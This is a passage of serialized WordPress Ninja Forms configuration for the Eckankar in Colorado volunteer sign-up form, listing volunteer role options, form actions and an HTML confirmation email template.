Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:15:\"Creative Artist\";s:5:\"value\";s:15:\"Creative Artist\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:33:\"Food Services For After the Event\";s:5:\"value\";s:33:\"Food Services For After the Event\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Greeter\";s:5:\"value\";s:7:\"Greeter\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Panelist\";s:5:\"value\";s:8:\"Panelist\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:15:\"Panel Moderator\";s:5:\"value\";s:15:\"Panel Moderator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:28:\"Prelude Music Before Service\";s:5:\"value\";s:28:\"Prelude Music Before Service\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Speaker\";s:5:\"value\";s:7:\"Speaker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Timekeeper\";s:5:\"value\";s:10:\"Timekeeper\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:12;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:19:\"listmultiselect_233\";s:15:\"container_class\";s:17:\" one-third first \";s:11:\"field_label\";s:19:\"ECK Worship Service\";s:9:\"field_key\";s:19:\"listmultiselect_233\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:267;}i:15;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:16;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:18:\"Message (optional)\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_229\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:18:\"Message (optional)\";s:9:\"field_key\";s:12:\"textarea_229\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:272;}i:16;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:17;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663800740469\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"638\";}i:17;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:18;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_231\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_231\";}s:2:\"id\";i:274;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:20\";s:5:\"label\";s:9:\"Save Form\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:93;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:20\";s:5:\"label\";s:17:\"Send copy to user\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_223}\";s:13:\"email_subject\";s:44:\"Eckankar in Colorado Volunteer Opportunities\";s:13:\"email_message\";s:4614:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_221},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website offering your services as an ECK volunteer.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_221}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_222}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_223}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_224}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_225}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #23507d\"><strong>Area(s) for which you have volunteered:</strong></span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>Book Discussions:</strong> {field:listmultiselect_228}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Community HU:</strong> {field:listmultiselect_232}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ECK Worship Service:</strong> {field:listmultiselect_233}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Email Newsletter Help:</strong> {field:listmultiselect_234}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Round Tables:</strong> {field:listmultiselect_235}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Satsangs:</strong> {field:listmultiselect_236}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Vahana:</strong> {field:listmultiselect_237}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE </strong><em>(Optional)</em><strong>: </strong>{field:textarea_229}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">Your information will be forwarded to the Colorado ECK Volunteer Coordinator and you will be contacted soon. If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front 